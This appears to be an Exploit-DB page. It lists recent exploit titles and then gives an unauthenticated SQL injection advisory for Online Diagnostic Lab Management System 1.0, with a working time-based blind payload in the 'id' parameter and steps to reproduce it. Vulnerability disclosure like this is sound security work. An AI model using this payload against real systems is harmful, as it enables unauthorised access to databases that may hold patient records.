77bb25c902
8 changes to exploits/shellcodes Hospitals Patient Records Management System 1.0 - 'room_types' Stored Cross Site Scripting (XSS) Hospitals Patient Records Management System 1.0 - 'room_list' Stored Cross Site Scripting (XSS) Hospitals Patient Records Management System 1.0 - 'doctors' Stored Cross Site Scripting (XSS) SalonERP 3.0.1 - 'sql' SQL Injection (Authenticated) Online Diagnostic Lab Management System 1.0 - Account Takeover (Unauthenticated) Online Diagnostic Lab Management System 1.0 - Stored Cross Site Scripting (XSS) Online Diagnostic Lab Management System 1.0 - SQL Injection (Unauthenticated) WordPress Core 5.8.2 - 'WP_Query' SQL Injection
23 lines
No EOL
1.1 KiB
Text
23 lines
No EOL
1.1 KiB
Text
#Exploit Title: Online Diagnostic Lab Management System 1.0 - SQL Injection (Unauthenticated)
|
|
#Date: 11/01/2022
|
|
#Exploit Author: Himash
|
|
#Vendor Homepage: https://www.sourcecodester.com/php/15129/online-diagnostic-lab-management-system-php-free-source-code.html
|
|
#Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/odlms.zip
|
|
#Version: 1.0
|
|
#Tested on: Kali Linux 2021.4, PHP 7.2.34
|
|
|
|
#SQL Injection
|
|
SQL injection is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database.
|
|
Online Diagnostic Lab Management System 1.0 is vulnerable to the SQL Injection in 'id' parameter of the 'appointment list' page.
|
|
|
|
#Steps to reproduce
|
|
|
|
Following URL is vulnerable to SQL Injection in the 'id' field.
|
|
|
|
http://localhost/odlms/?page=appointments/view_appointment&id=1%27%20AND%20(SELECT%208053%20FROM%20(SELECT(SLEEP(7)))dJOC)%20AND%20%27test%27=%27test
|
|
|
|
Server accepts the payload and the response get delayed by 7 seconds.
|
|
|
|
#Impact
|
|
|
|
An attcker can compromise the database of the application by manual method or by automated tools such as SQLmap. |